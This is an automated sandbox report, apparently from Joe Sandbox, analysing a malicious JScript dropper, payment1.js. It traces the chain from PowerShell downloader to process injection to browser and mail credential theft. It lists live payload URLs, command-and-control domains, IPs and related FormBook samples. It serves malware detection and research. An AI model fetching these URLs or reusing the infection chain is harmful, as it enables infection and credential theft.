                Source: sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000002.2989293069.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000000.2028710594.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2989759441.0000000001340000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000002.2989293069.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000000.2028710594.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2989759441.0000000001340000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000002.2989293069.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000000.2028710594.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2989759441.0000000001340000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000002.2989293069.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 00000009.00000000.2028710594.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2989759441.0000000001340000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\x.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation
                Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000009.00000002.2989939402.0000000003060000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.2992102247.0000000005150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2104088509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2989897397.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2106523345.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2989992903.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2987628096.0000000003050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2110867358.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\MRINFO.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\MRINFO.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\MRINFO.EXE | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\MRINFO.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\MRINFO.EXE | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\MRINFO.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\MRINFO.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\MRINFO.EXE | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\MRINFO.EXE | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000009.00000002.2989939402.0000000003060000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.2992102247.0000000005150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2104088509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2989897397.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2106523345.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2989992903.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2987628096.0000000003050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2110867358.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 52 Scripting | Valid Accounts | 1 Exploitation for Client Execution | 52 Scripting | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 PowerShell | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 113 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 712 Process Injection | 1 Abuse Elevation Control Mechanism | Security Account Manager | 121 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 5 Obfuscated Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 41 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 41 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 712 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1617730 | Sample: payment1.js | Start date: 18/02/2025 | Architecture: WINDOWS | Score: 100

Start (payment1.js)
• Domains/IPs: www.weilaishijie.xyz; www.physicsbrain.xyz; 4 other IPs or domains
• Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 8 other signatures
• www.physicsbrain.xyz: Performs DNS queries to domains with low reputation
• Started: wscript.exe (1 16)

wscript.exe (1 16)
• Network: 196.251.92.64, 49731, 80 Web4AfricaZA Seychelles
• Dropped: C:\Temp\dddddd.ps1, ASCII
• Signatures: System process connects to network (likely due to code injection or exploit); JScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); 2 other signatures
• Started: powershell.exe (13)

powershell.exe (13)
• Dropped: C:\Users\user\AppData\Local\Temp\x.exe, PE32
• Signatures: Suspicious execution chain found; Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file
• Started: x.exe (3); conhost.exe

x.exe (3)
• Signatures: Antivirus detection for dropped file; Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
• Started: RegAsm.exe; RegAsm.exe

RegAsm.exe
• Signatures: Maps a DLL or memory area into another process
• Injected: sxkv2RIDKUVCF4X010eCnC.exe

sxkv2RIDKUVCF4X010eCnC.exe (injected by RegAsm.exe)
• Signatures: Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR)
• Started: MRINFO.EXE (13)

MRINFO.EXE (13)
• Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
• Injected: sxkv2RIDKUVCF4X010eCnC.exe
• Started: firefox.exe

sxkv2RIDKUVCF4X010eCnC.exe (injected by MRINFO.EXE)
• Network: www.dqvcbn.info 47.83.1.90, 52664, 52665, 52666 VODANETInternationalIP-BackboneofVodafoneDE United States; www.infiniteve.xyz 162.0.231.203, 52656, 52657, 52658 NAMECHEAP-NETUS Canada; 3 other IPs or domains
• Signatures: Found direct / indirect Syscall (likely to bypass EDR)

Source | Detection | Scanner | Label
payment1.js | 16% | Virustotal | -
payment1.js | 11% | ReversingLabs | Script-JS.Dropper.Heuristic

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\x.exe | 100% | Avira | TR/Dropper.Gen

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://www.weilaishijie.xyz/mvfs/ | 100% | Avira URL Cloud | malware
http://www.weilaishijie.xyz/mvfs/?28t=_DlH9FNpJbu&JZfd=OX+XGG1vMjnBpir6rX0/G3mm6BKDnX5s9v0C7sC38KVwA5xuSoQxQAVtGC05vfCZlgARXwgyCJM/mKbUQVyNeO12dcoATF+wDwavyiCFDGb9TNEZS4YCLPo= | 100% | Avira URL Cloud | malware
http://www.infiniteve.xyz/rvdc/?JZfd=4SS44dSHix1qeqRpZ30sUGwaRLQ6PL636AaAeL4eRpehwv4hyktLqvMv9AyoVvbLe7Ilavn5wnoOWJ/fZmmrIfslJ8D6BKaSqIEkHtgn+Cj3tNriNM+Lp4c=&28t=_DlH9FNpJbu | 100% | Avira URL Cloud | malware
http://www.travel-cure.sbs/0c5p/?JZfd=ZkUTV7pI9Ap5vIyRRAq5W5SemCe80v7MV0MOYxheQ3+8mZZcGVhaedsyExvQ8P0JBljjtNlykIwC9TSJUDwzYqYInCYcfCsRcBd6++ZWi3nQtc+XigtdVu0=&28t=_DlH9FNpJbu | 0% | Avira URL Cloud | safe
http://www.lucynoel6465.shop/9gtw/?JZfd=bFQVCxzo4meVUPRnP0n3FR5ZzBASsiXRVHB0uPlWJiDXwsbOt8zcfdxm4ktJdQTn5zPq+Y8ykDyEtSWLtIWRcrie4i7GHURObbczaEgRbEWCMNyWzbPKN50=&28t=_DlH9FNpJbu | 100% | Avira URL Cloud | phishing
http://www.dqvcbn.info/xqy6/ | 100% | Avira URL Cloud | malware
http://www.dqvcbn.info | 100% | Avira URL Cloud | malware
http://196.251.92.64/crypt/popo.ps1 | 100% | Avira URL Cloud | malware
http://www.physicsbrain.xyz/ajxq/?JZfd=Z0yNDnK53JgtMSLt/Q+dSz0HWqwkNuop0AL5Lrb95TYezZcCk+GBjjC2rO5AP3na8OTPjj2cyURwNj0Uenp5Hjv5SXrtYK2BmGwEpYXvWphiXX161SqTvYw=&28t=_DlH9FNpJbu | 100% | Avira URL Cloud | malware
http://www.physicsbrain.xyz/ajxq/ | 100% | Avira URL Cloud | malware
http://196.251.92.64/crypt/popo.ps1m? | 0% | Avira URL Cloud | safe
http://www.dqvcbn.info/xqy6/?JZfd=3AdOd/JiBJZfW59JF3bk/JUX+I6ir2eDUVeNMTHa5bokm3l1PR6gBk+gEKdbuXFpEa+iNwYC+tVHkUu9Fw3QKE4rVdEfXJGpPPZQf/r11XdvYWfnyknaUqI=&28t=_DlH9FNpJbu | 100% | Avira URL Cloud | malware
http://www.infiniteve.xyz/rvdc/ | 100% | Avira URL Cloud | malware
http://www.travel-cure.sbs/0c5p/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.weilaishijie.xyz | 13.248.169.48 | true | false | - | high
www.dqvcbn.info | 47.83.1.90 | true | false | - | high
www.travel-cure.sbs | 199.59.243.160 | true | false | - | high
www.physicsbrain.xyz | 13.248.169.48 | true | false | - | high
www.lucynoel6465.shop | 104.21.16.1 | true | false | - | high
www.infiniteve.xyz | 162.0.231.203 | true | false | - | high
Name | Malicious | Antivirus Detection | Reputation
http://www.weilaishijie.xyz/mvfs/ | true | Avira URL Cloud: malware | unknown
http://www.lucynoel6465.shop/9gtw/?JZfd=bFQVCxzo4meVUPRnP0n3FR5ZzBASsiXRVHB0uPlWJiDXwsbOt8zcfdxm4ktJdQTn5zPq+Y8ykDyEtSWLtIWRcrie4i7GHURObbczaEgRbEWCMNyWzbPKN50=&28t=_DlH9FNpJbu | true | Avira URL Cloud: phishing | unknown
http://www.travel-cure.sbs/0c5p/?JZfd=ZkUTV7pI9Ap5vIyRRAq5W5SemCe80v7MV0MOYxheQ3+8mZZcGVhaedsyExvQ8P0JBljjtNlykIwC9TSJUDwzYqYInCYcfCsRcBd6++ZWi3nQtc+XigtdVu0=&28t=_DlH9FNpJbu | true | Avira URL Cloud: safe | unknown
http://www.weilaishijie.xyz/mvfs/?28t=_DlH9FNpJbu&JZfd=OX+XGG1vMjnBpir6rX0/G3mm6BKDnX5s9v0C7sC38KVwA5xuSoQxQAVtGC05vfCZlgARXwgyCJM/mKbUQVyNeO12dcoATF+wDwavyiCFDGb9TNEZS4YCLPo= | true | Avira URL Cloud: malware | unknown
http://196.251.92.64/crypt/popo.ps1 | true | Avira URL Cloud: malware | unknown
http://www.dqvcbn.info/xqy6/ | true | Avira URL Cloud: malware | unknown
http://www.infiniteve.xyz/rvdc/?JZfd=4SS44dSHix1qeqRpZ30sUGwaRLQ6PL636AaAeL4eRpehwv4hyktLqvMv9AyoVvbLe7Ilavn5wnoOWJ/fZmmrIfslJ8D6BKaSqIEkHtgn+Cj3tNriNM+Lp4c=&28t=_DlH9FNpJbu | true | Avira URL Cloud: malware | unknown
http://www.physicsbrain.xyz/ajxq/?JZfd=Z0yNDnK53JgtMSLt/Q+dSz0HWqwkNuop0AL5Lrb95TYezZcCk+GBjjC2rO5AP3na8OTPjj2cyURwNj0Uenp5Hjv5SXrtYK2BmGwEpYXvWphiXX161SqTvYw=&28t=_DlH9FNpJbu | true | Avira URL Cloud: malware | unknown
http://www.physicsbrain.xyz/ajxq/ | true | Avira URL Cloud: malware | unknown
http://www.dqvcbn.info/xqy6/?JZfd=3AdOd/JiBJZfW59JF3bk/JUX+I6ir2eDUVeNMTHa5bokm3l1PR6gBk+gEKdbuXFpEa+iNwYC+tVHkUu9Fw3QKE4rVdEfXJGpPPZQf/r11XdvYWfnyknaUqI=&28t=_DlH9FNpJbu | true | Avira URL Cloud: malware | unknown
http://www.infiniteve.xyz/rvdc/ | true | Avira URL Cloud: malware | unknown
http://www.travel-cure.sbs/0c5p/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1852164332.0000026D0C65C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000001.00000002.1852164332.0000026D0C0FB000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.1852164332.0000026D0C4E3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.1852164332.0000026D0C4E3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.dqvcbn.info | sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2992102247.00000000051A8000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://contoso.com/License | powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/Icon | powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.1852164332.0000026D0C4E3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com | MRINFO.EXE, 0000000A.00000002.2990861843.00000000042F6000.00000004.10000000.00040000.00000000.sdmp, MRINFO.EXE, 0000000A.00000002.2992872250.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2990429324.0000000003296000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://196.251.92.64/crypt/popo.ps1m? | wscript.exe, 00000000.00000002.1935377292.00000174E9C4A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1852164332.0000026D0C65C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://oneget.orgX | powershell.exe, 00000001.00000002.1852164332.0000026D0C0FB000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.1852164332.0000026D0AEF1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1852164332.0000026D0AEF1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://oneget.org | powershell.exe, 00000001.00000002.1852164332.0000026D0C0FB000.00000004.00000800.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.16.1 | www.lucynoel6465.shop | United States | 13335 | CLOUDFLARENETUS | false
13.248.169.48 | www.weilaishijie.xyz | United States | 16509 | AMAZON-02US | false
199.59.243.160 | www.travel-cure.sbs | United States | 395082 | BODIS-NJUS | false
162.0.231.203 | www.infiniteve.xyz | Canada | 22612 | NAMECHEAP-NETUS | false
47.83.1.90 | www.dqvcbn.info | United States | 3209 | VODANETInternationalIP-BackboneofVodafoneDE | false
196.251.92.64 | unknown | Seychelles | 327813 | Web4AfricaZA | true
                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                        Analysis ID:1617730
                                                                        Start date and time:2025-02-18 08:13:17 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 8m 43s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:12
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:2
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • GSI enabled (Javascript)
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:payment1.js
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.expl.evad.winJS@14/8@6/6
                                                                        EGA Information:
                                                                        • Successful, ratio: 60%
                                                                        HCA Information:
                                                                        • Successful, ratio: 95%
                                                                        • Number of executed functions: 113
                                                                        • Number of non-executed functions: 262
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .js
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target powershell.exe, PID 5352 because it is empty
                                                                        • Execution Graph export aborted for target sxkv2RIDKUVCF4X010eCnC.exe, PID 4108 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:14:25 | API Interceptor | 6x Sleep call for process: powershell.exe modified
02:15:29 | API Interceptor | 1613650x Sleep call for process: MRINFO.EXE modified
Match: 104.21.16.1
Associated Sample Name / URL | Detection | Threat Name | Context
PO from tpc Type 34.1 34,2 35 Spec.js | malicious | FormBook | www.lucynoel6465.shop/jgkl/
PO from tpc Type 34.1 34,2 35 Spec 1.js | malicious | FormBook | www.tumbetgirislinki.fit/k566/
ebu.ps1 | malicious | FormBook | www.fz977.xyz/48bq/
BIS_MT103 101T000000121121.exe | malicious | FormBook | www.cheapwil.shop/ekxu/
crypt.exe | malicious | FormBook | www.clouser.store/0izs/
ReODK2A5DB.exe | malicious | FormBook | www.sigaque.today/n61y/
xBA5hw2TjG.exe | malicious | FormBook | www.fz977.xyz/406r/
jKR1K8ayHT.exe | malicious | FormBook | www.axis138ae.shop/do5s/
greatnamechangedwithgoodnews.hta | malicious | Cobalt Strike, FormBook | www.shlomi.app/r0jq/
http://dryade.cutegreetingcakes.com/ga/click/2-263541735-21475-52792-103465-64017-800122d652-72691c1ea5 | malicious | Unknown | dryade.cutegreetingcakes.com/ga/click/2-263541735-21475-52792-103465-64017-800122d652-72691c1ea5

Match: 13.248.169.48
Associated Sample Name / URL | Detection | Threat Name | Context
2024-02-17.js | malicious | FormBook | www.allenamento.xyz/6q5z/
PO.exe | malicious | FormBook | www.bitcoinescort.xyz/oodw/
ORD_VIO-002-2025e-O001.exe | malicious | FormBook | www.publicblockchain.xyz/6wak/
SFT20020117.exe | malicious | FormBook | www.pembukaan.xyz/dmuh/
QUOTE OF DRY DOCK REPAIR.exe | malicious | FormBook | www.autonomousrich.xyz/5l58/
PO# 81136575.exe | malicious | FormBook | www.zkderby.xyz/t73m/
QUOTATION NO REQ-19-000640.exe | malicious | FormBook | www.hugeblockchain.xyz/tq56/
Revised Order Confirmation.exe | malicious | FormBook | www.melengkung.xyz/fe9y/
SHIPMENT OF THE ORIGINAL DOCUMENTS.exe | malicious | FormBook | www.blockchaindapps.xyz/vf8y/
SWIFT COPY.js | malicious | FormBook | www.bitcoinvendor.xyz/clt8/
Match
  Associated Sample Name / URL | Detection | Threat Name | Context
www.physicsbrain.xyz
  QUOTE OF DRY DOCK REPAIR.exe | malicious | FormBook | 13.248.169.48
  SWIFT COPY.js | malicious | FormBook | 13.248.169.48
  CUD--Quotation list.exe | malicious | FormBook | 13.248.169.48
  DHL AWB.js | malicious | FormBook | 13.248.169.48
  SOA - Final Payment.exe | malicious | FormBook | 13.248.169.48
  QCX ender user 2025.exe | malicious | FormBook | 13.248.169.48
  SOA - Final Payment.exe | malicious | FormBook | 13.248.169.48
  SOA-CAVER.exe | malicious | FormBook | 13.248.169.48
  DHL.Vbs.vbs | malicious | FormBook | 13.248.169.48
  BJKzw4jO7c.exe | malicious | FormBook | 13.248.169.48
www.dqvcbn.info
  SWIFT COPY.js | malicious | FormBook | 47.83.1.90
  DHL AWB.js | malicious | FormBook | 47.83.1.90
  DHL.Vbs.vbs | malicious | FormBook | 47.83.1.90
  PAYMENT.js | malicious | FormBook | 47.83.1.90
  PAYMENT.js | malicious | FormBook | 47.83.1.90
  SecuriteInfo.com.FileRepMalware.27444.30572.exe | malicious | FormBook | 47.83.1.90
www.weilaishijie.xyz
  SWIFT COPY.js | malicious | FormBook | 13.248.169.48
  REQUEST FOR QUOTATION.exe | malicious | FormBook | 13.248.169.48
  new quotation.exe | malicious | FormBook | 13.248.169.48
  DHL AWB.js | malicious | FormBook | 13.248.169.48
  payment transfer form.exe | malicious | FormBook | 13.248.169.48
  Payment Swift Copy 76432650263970239=.exe | malicious | FormBook | 13.248.169.48
  Demande de devis. Quote Request.exe | malicious | FormBook | 13.248.169.48
  Documents.exe | malicious | FormBook | 13.248.169.48
  swift copy.exe | malicious | FormBook | 13.248.169.48
  Purchase Inquiry.exe | malicious | FormBook | 13.248.169.48
www.travel-cure.sbs
  2024-02-17.js | malicious | FormBook | 199.59.243.160
  PO.exe | malicious | FormBook | 199.59.243.160
  SWIFT COPY.js | malicious | FormBook | 199.59.243.160
  2025-02-14.js | malicious | FormBook | 199.59.243.160
  ebu.ps1 | malicious | FormBook | 199.59.243.160
  DHL AWB.js | malicious | FormBook | 199.59.243.160
  AGODA COMPANY PTE LTD.exe | malicious | FormBook | 199.59.243.160
  Bank Transfer Accounting Copy.Vbs.vbs | malicious | FormBook | 199.59.243.160
  (BBVA) SWIFT_consulta_de_operaciones 10-02-2025-PDF.exe | malicious | FormBook | 199.59.243.160
  AGODA COMPANY PTE LTD.exe | malicious | FormBook | 199.59.243.160
Match
  Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS
  PO from tpc Type 34.1 34,2 35 Spec.js | malicious | FormBook | 104.21.32.1
  nDHL_CUSTOM_CLEARANCE_FORM_3409249_pdf.exe | malicious | GuLoader, MassLogger RAT | 172.67.168.33
  DHL AWB Document_pdf.exe | malicious | GuLoader, Snake Keylogger | 104.21.32.1
